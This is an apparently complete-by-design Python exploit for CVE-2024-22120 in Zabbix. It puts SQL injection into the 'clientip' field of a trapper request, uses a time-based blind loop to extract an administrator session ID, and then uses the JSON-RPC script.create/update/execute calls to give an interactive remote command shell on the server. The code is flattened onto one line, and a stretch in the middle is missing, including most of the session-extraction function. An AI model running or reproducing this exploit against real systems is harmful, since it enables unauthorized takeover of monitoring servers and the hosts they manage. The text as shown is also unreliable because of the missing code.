import json import argparse import requests from pwn import * from datetime import datetime RED = '\033[0;31m' NC = '\033[0;0m' GREEN = '\033[0;32m' def SendMessage(ip, port, sid, hostid, injection): context.log_level = "CRITICAL" zbx_header = "ZBXD\x01".encode() message = { "request": "command", "sid": sid, "scriptid": "2", "clientip": "1' + " + injection + "+ '1", "hostid": hostid } message_json = json.dumps(message) message_length = struct.pack(' (after_query-before_query) > time_false: continue else: session_id += c #print("(+) session_id=%s" % session_id, flush=True) break print(f"(!) sessionid={session_id}") return session_id def GenerateRandomString(length): characters = string.ascii_letters + string.digits return "".join(random.choices(characters, k=length)) def CreateScript(url, headers, admin_sessionid, cmd): name = GenerateRandomString(8) payload = { "jsonrpc": "2.0", "method": "script.create", "params": { "name": name, "command": "" + cmd + "", "type": 0, "execute_on": 2, "scope": 2 }, "auth": admin_sessionid, "id": 0, } resp = requests.post(url, data=json.dumps(payload), headers=headers) return json.loads(resp.text)["result"]["scriptids"][0] def UpdateScript(url, headers, admin_sessionid, cmd, scriptid): payload = { "jsonrpc": "2.0", "method": "script.update", "params": { "scriptid": scriptid, "command": "" + cmd + "" }, "auth": admin_sessionid, "id": 0, } requests.post(url, data=json.dumps(payload), headers=headers) def DeleteScript(url, headers, admin_sessionid, scriptid): payload = { "jsonrpc": "2.0", "method": "script.delete", "params": [scriptid], "auth": admin_sessionid, "id": 0, } resp = requests.post(url, data=json.dumps(payload), headers=headers) if resp.status_code == 200 and json.loads(resp.text)["result"]["scriptids"] == scriptid: return True else: return False def RceExploit(ip, hostid, admin_sessionid,prefix): if prefix: url = f"http://{ip}/{prefix}/api_jsonrpc.php" else: url = f"http://{ip}/api_jsonrpc.php" headers = { "content-type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" } scriptid = CreateScript(url, headers, admin_sessionid, "whoami") while True: cmd = input('\033[41m[zabbix_cmd]>>: \033[0m ') if cmd == "": print("Result of last command:") elif cmd == "quit": DeleteScript(url, headers, admin_sessionid, scriptid) break UpdateScript(url, headers, admin_sessionid, cmd, scriptid) payload = { "jsonrpc": "2.0", "method": "script.execute", "params": { "scriptid": scriptid, "hostid": hostid }, "auth": admin_sessionid, "id": 0, } cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers) cmd_exe_json = cmd_exe.json() if "error" not in cmd_exe.text: print(cmd_exe_json["result"]["value"]) else: print(cmd_exe_json["error"]["data"]) if __name__ == "__main__": if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2024-22120-RCE") parser.add_argument("--false_time", help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)", default="1") parser.add_argument("--true_time", help="Time to sleep in case of right guess(make it bigger than false time, default=10)", default="10") parser.add_argument("--ip", help="Zabbix server IP") parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051") parser.add_argument("--sid", help="Session ID of low privileged user") parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid") parser.add_argument("--prefix", help="Prefix for zabbix site. eg: https://ip/PREFIX/index.php") args = parser.parse_args() admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time)) RceExploit(args.ip, args.hostid, admin_sessionid,args.prefix)